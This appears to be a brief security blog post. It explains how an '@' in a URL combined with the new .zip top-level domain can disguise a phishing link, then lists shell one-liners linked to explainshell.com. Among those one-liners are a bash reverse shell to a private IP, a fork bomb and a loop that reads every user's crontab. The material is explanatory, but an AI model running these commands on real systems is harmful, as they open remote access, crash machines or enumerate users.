Phishing using @-URL trick in DNS .zip domains

With Googles release of the DNS top-level-domains .zip and .mov a new phishing (mitre att&ck T1566) trick is possible as bobbyrsec wrote about.

Example 1

https://www.google.com/?q=example.text  <— FQDN = google.com

Example 2

https://www.google.com/example/text/@v1271.zip <— FQDN = google.com right? No, it is v1271.zip. Because the @ character describes e.g. the authentication of the URL.

Example 3

https://www.google.com/example/text/v1271.zip <— FQDN = google.com

Reason

Source: https://cv.jeyrey.net/img?equivocal-urls

Result

So doublechecking URLs becomes harder. Using Fido2, Passkeys or password-managers (e.g. bitwarden.com) with auto-fill becomes more important because they dont fall for that trick and are more phishing-resistant.

Mini/Reverse/Web-Shells explained

The website explainshell.com explains Mini/Reverse/Web-Shells (T1505.003): 

• Example 1: https://explainshell.com/explain?cmd=file%3D%24%28echo%20%60basename%20%22%24file%22%60%29 
• Example 2: https://explainshell.com/explain?cmd=for%20user%20in%20%24%28cut%20-f1%20-d%3A%20/etc/passwd%29%3B%20do%20crontab%20-u%20%24user%20-l%202%3E/dev/null%3B%20done 
• Example 3: https://explainshell.com/explain?cmd=%3A%28%29%7B%20%3A%7C%3A%26%20%7D%3B%3A# 
• Example 4: https://explainshell.com/explain?cmd=bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.1%2F4242+0%3E%261

More examples:

• :(){ :|:& };:
• for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done
• file=$(echo `basename "$file"`)
• true && { echo success; } || { echo failed; }
• cut -d ' ' -f 1 /var/log/apache2/access_logs | uniq -c | sort -n
• tar zcf - some-dir | ssh some-server "cd /; tar xvzf -"
• tar xzvf archive.tar.gz
• find . -type f -print0
• ssh -i keyfile -f -N -L 1234:www.google.com:80 host
• git log --graph --abbrev-commit --pretty=oneline origin..mybranch